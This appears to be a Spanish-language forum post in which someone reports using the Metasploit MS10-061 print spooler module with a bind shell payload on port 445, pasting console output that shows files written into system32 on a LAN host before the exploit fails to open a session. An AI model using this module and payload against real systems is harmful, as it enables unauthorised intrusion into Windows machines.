use este para el puerto 445
Citar
msf exploit(ms10_061_spoolss)
y use este payload
Citar
windows/shell/bind_tcp
al final me tiro esto
Citar
- Started bind handler
- Trying target Windows Universal...
- Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:xxx.xxx.x.xxx[\spoolss] ...
- Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:xxx.xxx.x.xxx[\spoolss] ...
- Attempting to exploit MS10-061 via \\192.168.1.102\Impresora ...
- Printer handle: 0000000098b668cf365bea47b9f719b4e8810b90
- Job started: 0x7
- Wrote 73802 bytes to %SystemRoot%\system32\kPaogXoonzoI5C.exe
- Job started: 0x8
- Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\SdAZJ3urN3OwGv.mof
- Attempting to exploit MS10-061 via \\192.168.1.102\laserjet ...
- Printer handle: 000000007d7e3c8a75b32247925a112809792c07 [-] Exploit exception: Unable to start print job: 1804
- Exploit completed, but no session was created.